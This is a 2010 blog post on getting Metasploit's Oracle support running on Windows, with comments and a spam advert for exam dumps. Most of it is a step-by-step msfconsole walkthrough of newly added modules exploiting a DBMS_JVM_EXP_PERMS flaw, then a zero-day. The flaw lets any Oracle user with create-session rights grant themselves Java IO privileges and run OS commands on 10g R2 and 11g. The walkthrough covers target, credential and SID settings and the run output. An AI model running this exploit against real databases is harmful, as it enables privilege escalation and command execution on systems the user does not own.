Metasploit Oracle Windows

March 15, 2010

I finally managed to get Oracle and Metasploit working (only in windows though). Here are the steps that i followed (thanks to bugtrace):
[1]Install subversion client
http://www.open.collab.net/files/documents/60/3006/CollabNetSubversion-client-1.6.9-1.win32.exe

[2]install ruby
http://rubyforge.org/frs/download.php/47082/ruby186-27_rc2.exe

[3]install ruby-oci8
wget http://rubyforge.org/frs/download.php/65901/ruby-oci8-1.0.7-mswin32.rb
ruby ruby-oci8-1.0.7-mswin32.rb

[4]
svn co http://metasploit.com/svn/framework3/trunk/ metasploit

cd metasploit
ruby msfconsole

——-
As i was very pleased to see the oracle exploits in action in Metasploit, i have also added 2 new exploits from David Litchfield’s blackhat talk (DBMS_JVM_EXP_PERMS exploit). The exploits let you execute OS Code against 10g R2, 11g R1 and 11g R2 if you have a valid user account (just create session privileged required). Please do a svn update to get the following new files:

modulesauxiliarysqlioraclejvm_os_code_10g.rb
modulesauxiliarysqlioraclejvm_os_code_11g.rb

Here is how it works:

C:metasploit>svn update

A modulesauxiliarysqlioraclejvm_os_code_10g.rb
A modulesauxiliarysqlioraclejvm_os_code_11g.rb

U modulesauxiliaryscannernfsnfsmount.rb
A modulesauxiliaryscannersmbsmb_enumshares.rb
U modulesauxiliarygatherdns_enum.rb
U modulesexploitsunixwebappphpbb_highlight.rb
U datawordlistsnamelist.txt
A datasqlmigrate14_add_loots_fields.rb

msf auxiliary(jvm_os_code_10g) > use auxiliary/sqli/oracle/jvm_os_code_10g
msf auxiliary(jvm_os_code_10g) > info

Name: DBMS_JVM_EXP_PERMS 10gR2, 11gR1/R2 OS Command Execution
Version: 8822
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
sid

Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
CMD echo metasploit >> %SYSTEMDRIVE%unbreakable.txt no CMD to execute.
DBPASS test yes The password to authenticate with.
DBUSER test yes The username to authenticate with.
RHOST 192.168.2.11 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID ORCLX yes The sid to authenticate with.

Description:
This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package
that allows any user with create session privilege to grant
themselves java IO privileges. Identified by David Litchfield. Works
on 10g R2, 11g R1 and R2 (Windows only)

References:
http://blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Litchfield
http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/

msf auxiliary(jvm_os_code_10g) > set RHOST 192.168.2.11
RHOST => 192.168.2.11
msf auxiliary(jvm_os_code_10g) > set RPORT 1521
RPORT => 1521
msf auxiliary(jvm_os_code_10g) > set DBUSER test
DBUSER => test
msf auxiliary(jvm_os_code_10g) > set DBPASS test
DBPASS => test
msf auxiliary(jvm_os_code_10g) > set SID ORCLX
SID => ORCLX
msf auxiliary(jvm_os_code_10g) > run

[*] Attempting to grant JAVA IO Privileges
[*] Attempting to execute OS Code
[*] Auxiliary module execution completed
msf auxiliary(jvm_os_code_10g) >

Enjoy!
——————————
Advert: We offer the best quality 70-271 study material and 1z0-050 dumps to help you pass 1z0-051 exams on time.

Comments

2 Comments

  • sumit says:

    Getting following error any idea what i could have missd
    msf auxiliary(jvm_os_code_10g) > run

    [*] Attempting to grant JAVA IO Privileges
    [*] Error: NameError uninitialized constant OCIError
    [*] Auxiliary module execution completed

  • sumit says:

    its working i missed to install ruby-oci8-1.0.7-mswin32.rb
    thanks

Leave a Reply

Your email address will not be published. Required fields are marked *

Trackback